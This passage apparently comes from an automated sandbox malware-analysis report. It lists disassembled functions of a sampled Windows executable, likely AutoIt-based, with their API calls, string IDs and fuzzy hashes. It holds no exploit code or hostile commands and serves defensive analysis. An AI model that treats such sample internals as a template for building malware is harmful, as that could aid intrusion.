                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 621800784-4108050209
                                                                                                                                                    • Opcode ID: 27a8d1a391d44048803f5840ac21889e260530b75c30abb05853da563ac7c2fc
                                                                                                                                                    • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                                                                                    • Opcode Fuzzy Hash: 27a8d1a391d44048803f5840ac21889e260530b75c30abb05853da563ac7c2fc
                                                                                                                                                    • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                                                                    Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                    • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                    • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                                                                    • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                                                                    • String ID: \VH
                                                                                                                                                    • API String ID: 3884216118-234962358
                                                                                                                                                    • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                                                    • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                                                                                    • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                                                    • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                                                                                    Function 00434B02 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 108libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                                                                                    • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                    • String ID: AU3_GetPluginDetails$Wu
                                                                                                                                                    • API String ID: 145871493-136108093
                                                                                                                                                    • Opcode ID: 1a8b951876d27d2db6043d1d88fc2ce87b629190fe6f898e4756a9c282465399
                                                                                                                                                    • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                                                                                    • Opcode Fuzzy Hash: 1a8b951876d27d2db6043d1d88fc2ce87b629190fe6f898e4756a9c282465399
                                                                                                                                                    • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                                                                                    Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                                                                    • IsMenu.USER32(?), ref: 0044854D
                                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                                                                    • DrawMenuBar.USER32 ref: 004485AF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 3076010158-4108050209
                                                                                                                                                    • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                                                    • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                                                                                    • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                                                    • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                                                                                    Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                                                                    • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$_memmove_wcslen
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 1589278365-1403004172
                                                                                                                                                    • Opcode ID: c22c1c8709533b42ddd55d3d4fc5b1188074a7fef71f847cac6d68069895a192
                                                                                                                                                    • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                                                                    • Opcode Fuzzy Hash: c22c1c8709533b42ddd55d3d4fc5b1188074a7fef71f847cac6d68069895a192
                                                                                                                                                    • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                                                                    Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Handle
                                                                                                                                                    • String ID: nul
                                                                                                                                                    • API String ID: 2519475695-2873401336
                                                                                                                                                    • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                                                    • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                                                                                    • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                                                    • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                                                                    Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Handle
                                                                                                                                                    • String ID: nul
                                                                                                                                                    • API String ID: 2519475695-2873401336
                                                                                                                                                    • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                                                    • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                                                                                    • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                                                    • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                                                                    Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                                                    • _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                                                                                    • String ID: Line:
                                                                                                                                                    • API String ID: 1874344091-1585850449
                                                                                                                                                    • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                                                    • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                                                                    • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                                                    • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                                                                                    Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: SysAnimate32
                                                                                                                                                    • API String ID: 0-1011021900
                                                                                                                                                    • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                                                    • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                                                                    • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                                                    • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                                                                    Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                      • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                                      • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                                      • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                                      • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                                    • GetFocus.USER32 ref: 0046157B
                                                                                                                                                      • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                                                                      • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                                                                    • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                                                                    • __swprintf.LIBCMT ref: 00461608
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                                                                                    • String ID: %s%d
                                                                                                                                                    • API String ID: 2645982514-1110647743
                                                                                                                                                    • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                                    • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                                                                    • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                                    • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                                                                    Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                                                    • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                                                                    • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                                                    • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                                                                    Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3488606520-0
                                                                                                                                                    • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                                                    • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                                                                    • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                                                    • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                                                                    Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ConnectRegistry_memmove_wcslen
